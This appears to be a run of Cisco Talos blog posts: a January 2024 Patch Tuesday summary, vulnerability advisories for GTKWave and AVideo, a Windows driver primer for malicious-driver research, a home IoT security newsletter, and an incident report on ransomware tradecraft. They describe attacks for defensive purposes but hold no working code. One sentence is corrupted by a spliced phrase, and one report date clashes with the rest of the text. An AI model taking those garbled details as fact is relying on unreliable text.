Many of the company’s monthly security updates in 2023 included vulnerabilities that were actively being exploited in the wild or had publicly available exploits already in circulation.
The company started out 2024 by disclosing 48 vulnerabilities on Tuesday across its suite of products and services, 46 of which are considered of “important” severity.
One of the critical vulnerabilities patched Tuesday is CVE-2024-20674, a security bypass vulnerability in the Windows Kerberos authentication protocol. An attacker could carry out a man-in-the-middle attack to exploit this vulnerability and spoof the Kerberos authentication server, therefore bypassing the authentication process.
Because of Keberos’ presence on several of the most popular operating systems, Microsoft considers this vulnerability “more likely” to be exploited.
The other critical issue is CVE-2024-20700, which can lead to remote code execution. This vulnerability in Windows Hyper-V can be exploited if an adversary wins a race condition. Also, they must first gain access to a restricted network before an exploit can work.
There are two other remote code execution vulnerabilities that are worth mentioning, both of which Microsoft considers to be of “important” severity: CVE-2024-21307, which exists in Windows Remote Desktop Client, and CVE-2024-21318, which affects SharePoint Server.
In the case of CVE-2024-21307, the vulnerability can be triggered if an authenticated user connects to a malicious remote desktop server where the remote desktop host server sends a specially crafted Server RDP Preconnection that targets the remote client's drive redirection virtual channel. This could lead to remote code execution on the victim's machine.
CVE-2024-21318 is relatively easier for an attacker to hypothetically exploit, only requiring them to write and inject specific code to SharePoint Server.
The Windows Kernel also contains an elevation of privilege vulnerability, CVE-2024-20698, which could allow an attacker to gain SYSTEM privileges. There is little other information on how an attacker could exploit this vulnerability.
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62847 – 62850 and 62854 – 62861. There are also Snort 3 rules 300797 – 300802.
Cisco Talos’ Vulnerability Research team has disclosed dozens of vulnerabilities over the past month, including more than 30 advisories in GTKWave and a critical vulnerability in ManageEngine OpManager.
Cisco ASIG also recently discovered an information disclosure vulnerability in DuoUniversalKeycloakAuthenticator, an authentication solution for Keycloak, an open-source identity and access management solution.
There are also multiple vulnerabilities in AVideo, an open-source video broadcasting suite, that could lead to arbitrary code execution.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager, a network management solution.
TALOS-2023-1851 (CVE-2023-47211) can be exploited if an adversary sends a target a specially crafted HTTP request, which could allow them to create a file in any location outside of the default MiBs file’s location directory. This vulnerability has a critical severity score of 9.1 out of 10.
This vulnerability arises if the adversary uses OpManager and navigates to Settings -> Tools -> MiB Browser and selects “Upload MiB.” The arbitrary file they could eventually create can only be one of a few file extensions, however, including .txt, .mib and .mi2.
Multiple vulnerabilities in GTKWave
Discovered by Claudio Bozzato.
Cisco Talos recently discovered multiple vulnerabilities in the GTKwave simulation tool, some of which could allow an attacker to execute arbitrary code on the targeted machine.
GTKwave is a wave viewer used to run different FPGA simulations. It includes multiple versions to run on macOS, Linux, Unix and Microsoft machines. The open-source software analyzes trace files to look at the results of simulations run across different design implementations, or to analyze protocols captured with logic analyzers.
Talos researchers found a wide array of security issues across this software that affect different functions in GTKwave, many of which are triggered if an attacker can trick the targeted user into opening a specially crafted malicious file. In all, Talos recently released 33 advisories that cover more than 80 CVEs. Many of these issues are caused by the reuse of vulnerable code across the software. Other vulnerabilities are often duplicated by the adversary sending different file types as the initial infection document.
There are eight integer overflow vulnerabilities that could result in memory corruption, and eventually, arbitrary code execution: TALOS-2023-1812 (CVE-2023-38618, CVE-2023-38621, CVE-2023-38620, CVE-2023-38619, CVE-2023-38623, CVE-2023-38622), TALOS-2023-1816 (CVE-2023-35004), TALOS-2023-1822 (CVE-2023-35989), TALOS-2023-1798 (CVE-2023-36915, CVE-2023-36916), TALOS-2023-1777 (CVE-2023-32650), TALOS-2023-1824 (CVE-2023-39413, CVE-2023-39414), TALOS-2023-1790 (CVE-2023-35992) and TALOS-2023-1792 (CVE-2023-35128).
The most common vulnerability type Talos researchers found in GTKWave were out-of-bounds write issues that could lead to arbitrary code execution. All the following vulnerabilities could be exploited if a target opened an attacker-created file:
TALOS-2023-1807 (CVE-2023-37921, CVE-2023-37923, CVE-2023-37922) can also lead to remote code execution, but in this case, is caused by an arbitrary write issue.
An information disclosure vulnerability exists in the instipod DuoUniversalKeycloakAuthenticator for Keycloak. Keycloak is an open-source identity and access management solution, and DuoUniversalKeyAuthenticator allows Keycloak to push a Cisco Duo notification to the Duo app, asking the user to authenticate in.
The Keycloak extension for Duo, after it detects that initial authentication has succeeded with Keycloak, redirects the user’s browser to the configured duosecurity.com endpoint, sending the username and password in question each time.
TALOS-2023-1907 (CVE-2023-49594) indicates that this is unnecessary exposure of this data, potentially allowing an attacker to steal or view this information.
Multiple vulnerabilities in WWBN AVideo
Discovered by Claudio Bozzato.
WWBN AVideo contains multiple vulnerabilities that an attacker could exploit to carry out a range of malicious actions, including brute-forcing user credentials and forcing a targeted user to reset their password to something the attacker knows.
AVideo is a web application, mostly written in PHP, that allows users to create audio and video sharing websites. Users can import videos from other sources, like YouTube, encode the videos and then make them shareable in various ways.
There are multiple cross-site scripting vulnerabilities in AVideo that could allow an attacker to execute arbitrary JavaScript code on the targeted machine:
An attacker could exploit these vulnerabilities by tricking a user into visiting a specially crafted web page.
There are three other vulnerabilities — TALOS-2023-1869 (CVE-2023-47171), TALOS-2023-1881 (CVE-2023-49738) and TALOS-2023-1880 (CVE-2023-49864, CVE-2023-49863, CVE-2023-49862) — that could allow adversaries to read arbitrary files with an HTTP request targeting different parameters in AVideo’s “objects/aVideoEncoderReceiveImage.json.php” file.
Talos researchers also discovered TALOS-2023-1896 (CVE-2023-49589), an insufficient entropy vulnerability that can allow an attacker to forge a password reset for an administrator account. This could allow an adversary to reset a user’s account, set a new password that only the adversary knows, and then log in with that account information. An adversary could also exploit TALOS-2023-1897 (CVE-2023-50172) to prevent AVideo from sending an email to the associated account’s email address alerting them of the password reset process, so exploitation becomes less evident.
Similarly, TALOS-2023-1900 (CVE-2023-49599) can also be exploited using this method, but this vulnerability targets administrator accounts.
The most serious vulnerability Talos discovered in AVideo is TALOS-2023-1886 (CVE-2023-47862), a local file inclusion vulnerability that could eventually lead to arbitrary code execution. This vulnerability has a severity score of 9.8 out of 10. TALOS-2023-1885 (CVE-2023-49715) is an unrestricted php file upload vulnerability that can also lead to code execution, but only when used in conjunction with a local file inclusion vulnerability like TALOS-2023-1886.
TALOS-2023-1898 (CVE-2023-49810) could be exploited in AVideo by sending a specially crafted HTTP request. An adversary could exploit this vulnerability to bypass the CAPTCHA process when trying to log into the service, therefore making it easier for an attacker to attempt to brute force login credentials or password-guessing attacks.
Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Real-world examples can be found in our previous research into the driver-based browser hijacker RedDriver and HookSignTool — a signature timestamp forging tool.
With the existence of malicious drivers, there is a need for those who can analyze identified samples. This analysis requires specific knowledge of the Windows operating system, which can be difficult to acquire. Windows drivers and the kernel can be overwhelming to learn about, as these topics are vast and highly complex. The documentation available on these subjects is daunting and difficult to navigate for newcomers, even for those with programming experience. This initial hurdle and steep learning curve create a high barrier of entry into the subject. To many, the kernel space seems to be an arcane and hidden part of the operating system.
This series is a high-level introduction and overview of drivers and the Windows kernel for those interested in malicious driver research, but do not have experience with them. However, previous experience with basic Windows concepts like processes, threads, the registry and common system files is recommended, along with experience or familiarity with disassemblers and C or C++ programming. In the future it may be advantageous to acquire experience with the Rust programming language, as Microsoft has slowly started to migrate portions of the Windows 11 kernel over to Rust.
This series intends to serve as a starting point for learning about malicious drivers and to lower the barrier of entry into the subject. Each portion of this series will build on the last, but first, we’ll introduce the basic concepts of drivers and the Windows kernel and the I/O system.
In the next entry, we’ll expand on the I/O system and driver operations. Eventually, we’ll get to topics like the security concepts surrounding drivers and how they can be used in a malicious context, and basic driver analysis and how to identify a malicious driver.
Links to external resources for further information on relevant subjects will be provided to supplement this blog post. It is highly recommended to explore the links, as this blog series is meant to serve as a broad introduction to concepts rather than detailed instruction. A list of recommended resources for further reading will also be provided.
The Windows kernel
Kernel mode vs. User mode
The Windows operating system (OS) is split into two layers or “modes:” User mode, where the files and applications that users interact with reside, and kernel mode, where kernel-mode drivers and the underpinnings of Windows perform the necessary functions to run the system. Splitting the operating system into two modes creates a highly controlled logical barrier between the average user and the Windows kernel. This barrier is necessary to maintain the integrity and security of the system, as the kernel is a highly complex and fragile environment.
In memory, the two modes are logically separated into two “virtual” address spaces. Within the user-mode address space, applications open a process when executed and run in separate private virtual memory spaces. If a user-mode process crashes, running in private memory spaces allows the system to continue operating and handle the crashed process accordingly. However, in kernel mode, drivers all run in the same virtual address space along with the operating system itself. If a driver mistakenly writes to the address of another driver or the operating system, the entire system crashes to prevent damage, resulting in what is commonly known as the “Blue Screen of Death” (BSOD). In other words, it's easy to crash the system with a driver, so they must be written carefully.
Kernel concepts
The Windows kernel is an intensely complex subject, warranting entire books and courses dedicated to different aspects of its functionality. It would not be possible to thoroughly describe the kernel in just one blog post. However, we will introduce the basics by discussing drivers and how they interact with the operating system. This will provide a foothold for starting the process of learning about the kernel and drivers in greater detail.
The kernel-mode layer is composed of an array of different components that work in concert to run the system. As the chart below shows, kernel mode is further divided into different layers.
As can be seen above, drivers run in kernel mode rather than in user mode with applications. Kernel mode can be seen as the underlying infrastructure of the OS that is never directly interacted with by a typical user. Although the layers are logically separated, information is still exchanged between the layers through highly controlled channels.
In modern operating systems, a systems privilege model is typically divided into logical layers commonly represented as “rings.” Each ring represents a level of privilege, with the outermost ring being the least privileged and the center ring — the kernel — is the highest privileged. An application in the outer ring cannot directly perform actions that require the privilege of an inner ring. This model is referred to as “hierarchical protection domains” or simply as “protection rings.”
The protection rings model is designed to prevent faults and malicious activity by restricting direct access to system resources. Any actions from an outer ring that require higher privileges must make a “system call” (also known as a syscall). Making a syscall begins a chain of functions that ultimately performs the intended action in the kernel at Ring 0. As an example, if an application were to execute the Windows API function OpenProcess, the flow of execution would look like this in an x64 system:
In Ring 3, each function in the flow of execution is effectively a wrapper for the next function in the chain, each one passing execution to the next. However, once NtOpenProcess in ntdll.dll is called, the next step is making the actual syscall to the kernel which in turn executes KiSystemCall64 — the system service dispatcher.
Once it receives a syscall, KiSystemCall64 retrieves the address of the requested function from the System Service Descriptor Table (SSDT); a table of addresses of kernel functions that have been mapped for use by system calls. Once the appropriate address has been located, the requested function will execute.
Executive layer
Within kernel mode is another layer referred to as the “executive layer,” which contains several components that provide functions and services for drivers:
These are referred to as “managers” and each provides an interface to its various functions for drivers to use. Each manager is responsible for a specific area of functionality, such as object management or memory management. The manager names are fairly self-explanatory, but each will be discussed in this blog series when necessary. To further understand the various managers we recommend exploring the MSDN links provided in the list above.
A large portion of the behavior observed while analyzing malicious drivers will be related to functions that are provided by the executive layer manager interfaces. Later in this series, we will discuss how the I/O manager plays a large role in the operations of drivers, including malicious ones.
Hardware abstraction layer (HAL)
Below the kernel sits the hardware abstraction layer (HAL) which can be described as an intermediary layer between the hardware and the rest of the OS. In Windows, the HAL is implemented in the aptly named “hal.dll.” The HAL facilitates communication between the OS and the physical hardware and provides a standard interface to processor resources. An important feature of the HAL is that it allows Windows to operate on different CPU architectures by implementing different versions of the HAL depending on the architecture.
As opposed to many DLLs, most of the functions exported by hal.dll are not intended to be called directly by a programmer via an application or driver but are intended to be used by other modules and components in the system. Most of the functions hal.dll exports are undocumented and many are obsolete holdovers from previous Windows versions.
Drivers
What do drivers do?
Drivers serve a critical background role in the Windows operating system, and most users will not directly interact with them past the initial installation or the occasional update. While the file structure may be similar to user-mode executables, they function quite differently. Unlike user-mode executables, drivers do not use the standard Win32 API routines, but rather “driver support routines,” which are provided by a set of kernel mode libraries and the interfaces of the manager components within the executive layer.
Generally, drivers operate in kernel mode and facilitate communication between the operating system and hardware or connected devices. However, this is an oversimplification as there are many types of drivers and not all interface directly with hardware, such as filter drivers and software drivers. Some drivers operate within user mode, although for this blog series, we will focus on kernel-mode drivers only. For more information on driver types, we recommend referring to the Microsoft documentation.
In simple terms, a driver receives requests from clients and performs different actions in the system that are outside the direct capabilities of the client itself. These actions can include interfacing with hardware, manipulating threads or processes, network filtering and many others that require kernel-level access. In other words, drivers serve as conduits for instructions given to the operating system by bridging the gap between kernel mode and user mode.
Driver files
From a superficial standpoint, a driver is essentially a dynamic link library (DLL) that has the “.sys” file extension, although it differs greatly from typical DLL files. A driver cannot be executed in the same manner as other executable files and the functions and libraries that a driver imports are not available for use in user-mode applications. To run a driver, it must first be loaded into the operating system through a specific process that will be discussed later on in this series.
In many cases, a .sys file will initially be contained within a “driver package” along with a setup information (INF) file, a catalog (.cat) file and any other files the driver might require. An INF (.inf) file is a text file that provides Windows with all the necessary information it needs to install the driver such as version info, device IDs, driver files and .cat files. An example and overview of INF files can be found here in Microsoft's documentation. A catalog file contains the file hashes of the contents of the driver package, which Windows uses to verify the integrity of the files contained within the package.
How do drivers work?
Windows Driver Model and Frameworks
With the release of Windows 98 and Windows 2000, Microsoft released the Windows Driver Model (WDM), a fundamental model for device drivers that, among other features, eased the process of driver development. This new model made it easier to port a driver's source code between different versions of Windows, rather than having to write a separate driver for each version. This portability provided forward compatibility, which was not possible before its release. A WDM driver is not guaranteed to be backward compatible. However, older versions of Windows may not have the same features available.
One of the downsides to WDM was that it does not inherently handle Plug and Play (PNP) or Power Management I/O requests, which increasingly became more common with hardware. This led to most developers copying boilerplate code that could handle these requests and using it in their drivers, which is a rather inefficient process.
To make writing a driver a more streamlined process, Microsoft introduced the Windows Driver Frameworks (WDF), also formerly known as Windows Driver Foundation. Providing developers with WDF removed the need for boilerplate code that used to be required for each driver. However, WDF itself is not a singular framework. It actually contains two distinct frameworks, KMDF (Kernel-mode Driver Framework) and UMDF (User-mode Driver Framework). WDF does not directly replace WDM, but provides a more efficient interface to WDM that simplifies some of the more complicated tasks.
Although Microsoft recommends using KMDF to develop kernel-mode drivers at the time of this writing, WDM can still be a viable option and is still the core model that Windows drivers are based upon. WDF adds a layer of abstraction to development which takes care of some of the more tedious aspects of writing a driver, however, it is beneficial to learn WDM, as it provides a clearer view of some of the actions that WDF performs behind the scenes. For this reason, the code examples in this blog series will be utilizing WDM. Additionally, it is valuable knowledge from a research and defense perspective, as it is still common for malicious drivers to be written using WDM. It is worth mentioning that in the case of developing production drivers, it is highly recommended to follow Microsoft’s guidance and standard practices.
Driver code
Generally, Windows drivers are written in C, although with Visual Studio 2012 and Windows Driver Kit (WDK) 8, Microsoft began supporting C++. Some driver developers prefer C++, as it allows for easier resource management by using a concept called Resource Acquisition is Initialization (RAII). While RAII is outside the scope of this blog post, understanding what it is can be useful later on while learning about drivers.
An important difference between writing drivers and user-mode executables is that many of the memory operations for drivers must be done manually. In a user-mode application, any private allocated memory will be freed once the process terminates. Conversely, while writing a driver, memory must be manually allocated and freed accordingly, otherwise, it may result in a memory leak and cause unexpected issues. Special care should be taken to ensure all memory is appropriately handled while developing drivers.
To perform its basic operations, a driver must first implement its required “standard routines”. Without implementing each of these standard routines, a driver could not function:
Before diving into how a driver works, it is necessary to first introduce “objects,” one of the key concepts of the Windows kernel.
The Windows OS is object-based, meaning the files, threads, executables and all the various components within the system are defined and represented as specific object types.
Conceptually, representing an object as a defined type provides standardization and portability, as the structure of a defined type will always be the same regardless of what is interacting with it. The data held within a structure may change, but the definition of the structure itself cannot be changed, as it would then be a different object type by definition.
Note: Object-based is not to be confused with object-oriented programming (OOP). While the Windows OS does implement some OOP principles, one term should not be conflated with the other.
As an example, the system represents the image of a loaded driver as an object type called DRIVER_OBJECT, and the different members of the structure represent and contain its corresponding attributes, such as DriverSize and DriverName.
You will encounter many types of objects while learning about drivers or the kernel, and documentation for many can be found on the MSDN website. MSDN is the most important resource available while learning about the Windows operating system. Additionally, searching for an object type or function name in a search engine can provide helpful information, as there are several undocumented functions and data types.
DriverEntry
The most immediate requirement for a driver’s code is that it must have an entry routine, typically named DriverEntry. The first routine that is called once a driver is loaded. There are multiple required responsibilities that DriverEntry must take care of:
Implementing the other standard routines.
Implementing dispatch routines and assigning their entry points.
Creating and initializing required resources, objects and devices.
DriverEntry takes two parameters: DriverObject and RegistryPath.
The RegistryPath parameter is a pointer to a Unicode string that contains the registry path to the driver's “parameters” key in the registry, which is created when the driver is initially installed on the system. The key typically contains configuration information that the driver might require, depending on how the driver was written.
The DriverObject parameter is a pointer to a structure defined as DRIVER_OBJECT, which represents the kernel-mode driver itself and contains information about the driver within its members. DRIVER_OBJECT is partially opaque, meaning that not all of its members are viewable to the user.
The example below shows what a typical DriverEntry function might look like written in C++:
In this example, DriverEntry simply returns an NTSTATUS value of STATUS_SUCCESS once it has finished executing.
As mentioned earlier, DriverEntry must also create and initialize the required resources, objects, or devices that the driver needs. For demonstration purposes, this driver needs to initialize and create a device object and a symbolic link.
For a driver to receive requests from a client it must create a device object, which is represented as the structure DEVICE_OBJECT:
“The DEVICE_OBJECT structure is used by the operating system to represent a device object. A device object represents a logical, virtual, or physical device for which a driver handles I/O requests.” - MSDN
A device object can be thought of as an interface for requests between a client and a driver. Instead of sending a request directly to a driver, a device object acts as the communication point for a client. Creating a device object is done by initializing a PDEVICE_OBJECT structure and then passing it to the IoCreateDevice function as the DeviceObject parameter. A name for the device represented as a Unicode string is also supplied and passed as the DeviceName parameter.
Now, a symbolic link can be initialized and created using the device object name by calling the IoCreateSymbolicLink function. A symbolic link — or symlink — is linking a device object name to a specified name that will be viewable to users.
After setting up the device object and symlink, the driver is now ready to implement its dispatch routines — the functions that process the different requests that a driver might receive.
Unload routine
Another required section of code is a DriverUnload routine, a function that determines what operations will be performed once a driver is unloaded. This will commonly include deleting device objects and symbolic links created by the driver or performing any cleanup that may be necessary.
In DriverEntry, the unload routine must be declared by assigning it to the DriverUnload member of the DriverObject structure. In this example, the device object and symlink will be deleted.
Dispatch routines and function codes
An important member of the DRIVER_OBJECT structure to understand is MajorFunction. This member is defined as PDRIVER_DISPATCH – a pointer to a DRIVER_DISPATCH structure – and contains an array of entry points for a driver's dispatch routines; effectively a list of operations that a given driver supports. Dispatch routines are functions within a driver that are called when it receives a system-defined “function code”, also known as a “MajorFunction code.” As can be seen in the list below, each one has the prefix “IRP_MJ_”:
It is worth noting that while the majority of function codes start with “IRP_MJ_”, there are some that use the prefix “IRP_MN_” which indicates that it is a MinorFunction, a subordinate of a related MajorFunction. As an example, IRP_MN_SET_POWER is a subordinate of IRP_MJ_POWER. A more complete list of Major- and MinorFunction codes can be found here in the Microsoft documentation.
Function codes essentially serve as instructions for a driver to perform certain actions by request. To be able to handle function codes, a driver must assign a dispatch routine entry point to the appropriate MajorFunction code within the DriverObject structure. This assignment takes place in the DriverEntry routine, and as can be seen below, each dispatch routine is assigned to a specific function code:
For example, if the driver in the example above receives a request that contains the function code IRP_MJ_CREATE, it would then execute the dispatch routine TestDriverCreate. Below is an example of what the TestDriverCreate routine could look like:
IRP_MJ_CREATE is an important function code as it must be handled by every driver, whether it makes use of it or not. In the TestDriverCreate function shown above, the function code is handled by doing nothing at all and then completing the request by calling IoCompleteRequest. A more detailed explanation for handling requests will appear later in this blog series. For demonstration purposes this example intentionally has no functionality; however, in a real driver there might be actions performed when handling this function code.
The second parameter of the TestDriverCreate function, “PIRP Irp”, refers to a critical structure used in the operation of drivers: the I/O request packet, also known as an “IRP”.
The I/O system and I/O request packets (IRPs)
To manage the flow of requests to drivers, among other operations, Windows implements what is called the I/O (input/output) system. This system is responsible for facilitating the flow of data between drivers, peripheral devices and any client making a request to a driver. The data — including major function codes — is encapsulated in what is called an “IRP,” short for “I/O request packet,” represented as a structure defined as _IRP.
As part of the I/O system, the I/O manager serves as an interface to kernel-mode drivers by creating and sending IRPs to drivers, which can contain a function code for the receiving driver to act upon. However, the I/O manager is not the only source of IRPs, as they can be created by other managers in the Executive layer, and in some cases, they may be created by a driver. Creating IRPs is not the only function of the I/O manager. It is also responsible for creating a driver object for each installed driver.
As mentioned earlier, the I/O system plays a large role in the operations of drivers, and it is worth becoming familiar with its components. In our next entry in this series, we will expand on the topic of IRPs and the I/O system and their relation to drivers. Device stacks and IOCTLs will also be introduced. Later in the series, we will also walk through the process of loading and debugging a driver, eventually leading to malicious driver behavior and analysis.
Until the next entry in this series, we recommend exploring the links provided throughout this blog. The basic concepts surrounding drivers and the kernel environment will become familiar with exposure to them, as well as reading the documentation or relevant research. Below is a list of recommended readings that will provide invaluable information on how drivers are written and the way they work.
Books
Windows Kernel Programming by Pavel Yosifovich
Fantastic in-depth overview of Windows kernel programming.
Windows NT Device Driver Development by Peter Viscarole, W. Anthony Mason
Older Windows device driver development book, but still has a large amount of currently relevant information.
Windows Internals: Part 1 & 2 by Pavel Yosifovich, Mark E. Russinovich, Alex Ionescu, David A. Solomon
Official book of Windows internals by Microsoft. Does not focus on the kernel but is a good reference to own.
The Threat Source newsletter is back after our winter break.
When I wasn’t spending my downtime chasing around my toddler, one of my main projects was to upgrade the internet connection at my house. My ISP started offering Gigabit speeds and a 60 GHz connection, which was appealing to me as someone who is always on a quest to find the best way to stream PS5 games to my Steam Deck.
This sent me down a path of reconfiguring my home network and re-adding a bunch of devices to a new network. And even though this sounds like a totally basic skill for anyone who works in cybersecurity, it was a big deal for me to set up a separate IoT-only network.
Many readers may have even gotten a new IoT device for a holiday gift. This mobile projector was featured on several “Top Gifts of 2023” lists I was looking at in December, and there are always the slam dunk gifts of a new home AI assistant like Google Home or the Amazon Echo Show to control all things “smart” in your home.
And we all know that, by being connected to the internet, many of these IoT devices are going to be vulnerable to adversaries. Last week, researchers found a network-connected torque wrench used in many industrial environments could be infected with ransomware.
There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues, so I don’t think I need to run down those dangers in this newsletter. I wanted to take this space to share a few reminders and best practices of how to best set up these devices and manage them. This is a topic I covered previously in video format a few years ago, but I’m sure much of the UI/UX in this tutorial has changed since then, and I feel like I learned quite a bit from “YouTube University” over the past week or so in my own journey.
Use network mapping software to track which devices connect to your network using what communication methods. NetworkMaps is a free, open-source option that I used when I was taking cybersecurity courses online.
Create an IoT-specific network. This was super easy for me to do with the Gigabit-enabled router my ISP sent me, but I set up a network specifically for these devices to connect to (like my baby monitor, smart TVs, etc.) with a completely different network name and password from my “main” network. This keeps these devices segmented so that, if a bad guy is lurking, they stay on that IoT-specific network that doesn’t talk to your more sensitive devices like a work laptop.
Make sure your router’s firewall is enabled, disable WPS and enable the WPA2 or WPA3 security protocol.
Immediately change the default usernames and passwords that come with any new WiFi-connected device you’re setting up.
Any home routers or IoT devices could point to OpenDNS servers for an additional (and free!) layer of security.
Disable any additional features or data-sharing you feel like you don’t need. The prime example of this for me is Amazon Sidewalk, the community network that allows Amazon devices to talk to one another and send alerts to users about various goings-on in their respective communities. The main drawback for me is that it allows your neighbors to pull off just a little of your internet bandwidth for their connected devices, too, and opens a whole slew of privacy concerns.
The one big thing
Cisco Talos recently worked with fellow security company Avast to release a new version of the decryptor for the Babuk ransomware. Our researchers obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor in its latest variant.
Why do I care?
Babuk is one of the most prevalent ransomware families in the wild right now, so any additional resources for victims to potentially recover faster, and for free, is good news. And Dutch Police, acting on threat intelligence supplied by Talos, identified, apprehended and the Dutch Prosecution Office prosecuted the threat actor behind Babuk Toa bad guy is lurkingtilla operations, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.
So now what?
The newest version of the decryptor is now available through No More Ransom, or directly on Avast’s website. Continued action from law enforcement to track down, apprehend and charge the operators behind ransomware is one of the many important steps we can take as a society and security community to reduce the prevalence of ransomware.
Top security headlines of the week
Security researchers are warning of actively exploited vulnerabilities in the Ivanti Connect Secure VPN that, as of Wednesday, still did not have a patch available. The vulnerabilities are an authentication bypass flaw (CVE-2023-46805) and a command injection issue (CVE-2024-21887). An adversary could chain these vulnerabilities to execute arbitrary commands on the targeted appliance. Incident response firm Volexity said earlier this week that government agencies and military branches across the globe, as well as several Fortune 500 private companies. Chinese state-sponsored actor UTA0178 is suspected to be behind the exploitation of these vulnerabilities, some dating back to December. Ivanti says it is still developing patches for these issues, one of which may not be available until mid-February. In the meantime, users should follow the mitigation steps outlined by Ivanti, and implement a new scanner that can detect exploitation attempts. (DarkReading, SecurityWeek)
Britain’s national library is working to restore its online services 11 weeks after a cyber attack, though a full recovery may take until the end of the year. The British Library started restoring read-only versions of its online catalog last week, including records of printed and rare books, maps, journals and music scores. The Rhysida ransomware group initially took credit for the attack in October 2023, claiming it was offering personal information for sale on the dark web. The library eventually confirmed that some employee data had been stolen in the attack, and it had to temporarily take its entire catalog offline. The attack also held up the payment system for which the library rewards authors and creators each time one of their works is checked out. (The Guardian, The New York Times)
Chinese government officials have apparently found a way to de-anonymize Apple AirDrop users to track anyone sharing content that’s outlawed by the country. AirDrop is normally encrypted, and has been used previously to share messages, content and art with other iPhone users in public that is against the ruling Communist Party in China. But the Beijing municipal government's justice bureau says China-backed experts have found a way to carry out a complex encryption attack to reveal the original sender of the messages and prosecute them. In November 2022, Apple updated AirDrop settings so users in China could only opt-in to receive files from unknown contacts during a 10-minute window before it automatically shut off. The feature did not previously have a time limit. Translations of government statements indicate that the method involves what are known as “rainbow tables” to defeat the measures AirDrop has in place to obfuscate users' phone numbers and email addresses. (Ars Technica, CBS)
First time ransomware was the top threat in 2023, according to Q4 2023 Talos Incident Response report
Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Cisco Talos Incident Response (Talos IR), notably a 17 percent increase from the previous quarter.
Talos IR observed operations involving Play, Cactus, BlackSuit and NoEscape ransomware for the first time this quarter.
As reflected in Talos IR’s quarterly report for the third quarter of 2024, the team responded to many incidents with miscellaneous post-compromise activity, though these attacks were limited in scale and contained by security efforts early in the attack chain before the adversary’s objectives could be fully determined. Other substantial threats this quarter included an insider threat attack and phishing campaigns, including a phishing cluster using malicious QR codes.
Education and manufacturing were tied for the most targeted verticals, together accounting for nearly 50 percent of the total number of incident response engagements, closely followed by healthcare and public administration. Compared to last quarter, we observed only a slight increase in engagements targeting the education sector while there was a 10 percent increase in engagements affecting the manufacturing vertical.
Adversaries commonly target entities in the education sector to conduct ransomware attacks or access sensitive student and faculty personally identifiable information (PII), such as financial data and credentials. Schools with limited cybersecurity capabilities and constrained resources are often the most vulnerable, as security remains a cost center. However, the opportunistic targeting employed by adversaries can still put school districts with robust cybersecurity programs at risk. Exfiltrated PII data remains an attractive target that is leveraged for follow-on attacks, sold on dark web forums, or used for monetary theft.
The manufacturing sector faces unique challenges due to its inherently low tolerance for operational downtime. The sector's crucial role in producing goods fundamental to various other critical infrastructure sectors means that any disruption in manufacturing processes not only affects the industry itself but may have cascading effects on the supply chain and dependent sectors. Supply chain attacks are a concern for the manufacturing sector, as such incidents can create unstable supply chain conditions that require immediate attention and action to protect assets, operations and/or reputation.
Ransomware activity increases
Play ransomware
Talos IR responded to a Play ransomware attack for the first time this quarter where adversaries used the legitimate remote access software AnyDesk to deepen their access and remain persistent. The adversaries used PsExec, an IT administration utility that allows users to execute programs on another computer, to disable security tools across multiple endpoints, likely to evade detection. After collecting credentials from various locations such as the Windows Registry, the attackers were able to compromise multiple domain controllers which were used to deploy ransomware across the environment.
In another Play ransomware engagement, Talos IR assessed with low confidence that after obtaining user credentials, the attackers attempted to bypass multi-factor authentication (MFA) by calling the organization’s help desk to register a new MFA device. This is an example of “vishing,” a social engineering technique in which attackers try to trick victims over the phone. While Talos is aware of other ransomware and cybercriminal groups who use vishing to gain initial access, it is not a technique we had previously associated with Play ransomware affiliates. Attackers also leveraged the open-source Windows password spraying tool SharpSpray and IP addresses associated with SurfShark and BlueVPS virtual private network (VPN) and virtual private server (VPS) providers. These methods and tools leveraged by Play affiliates are not well-documented in open-source reporting, suggesting these may be newly adopted techniques.
🎥
Want to hear these insights directly from our Talos Incident Responders? Watch the latest On Air video below!
Once inside the network, the adversaries executed several enumeration commands, such as "whoami" and "net group /domain," which provide information about the system owner and permission groups. Next, they dumped credentials from the memory of the Local Security Authority Subsystem Service (LSASS) and moved laterally by abusing Remote Desktop Protocol (RDP). A combination of the archive tool WinRAR and the open-source file transfer protocol (FTP) tool WinSCP was used for data exfiltration. Talos IR identified several persistence mechanisms deployed by the threat actors, including scheduled tasks and registry startup items. Before the execution of the ransomware binary, the attackers disabled several security tools and deleted the volume shadow copies to evade detection and inhibit system recovery.
First discovered in June 2022, Play (also known as Playcrypt) ransomware group has targeted over 300 organizations across the globe within the public and private sectors. Play affiliates typically compromise victim networks and append the “.PLAY” extension when encrypting files. Initial access vectors leveraged in Play attacks vary from social engineering to exploiting vulnerabilities in public-facing applications.
BlackSuit ransomware
In a ransomware engagement, Talos IR responded to a BlackSuit ransomware incident for the first time where threat actors used stolen VPN credentials to gain access to an account that did not have MFA enabled. Attackers enumerated the network and permission groups before dumping credentials from memory with the credential harvesting tool Mimikatz. Attackers exploited the privilege escalation vulnerability dubbed "ZeroLogon," tracked as CVE-2020-1472, which allows remote unauthenticated attackers to access domain controllers and obtain domain administrator access. The legitimate remote access software ScreenConnect was also used for command and control (C2) communication throughout the attack.
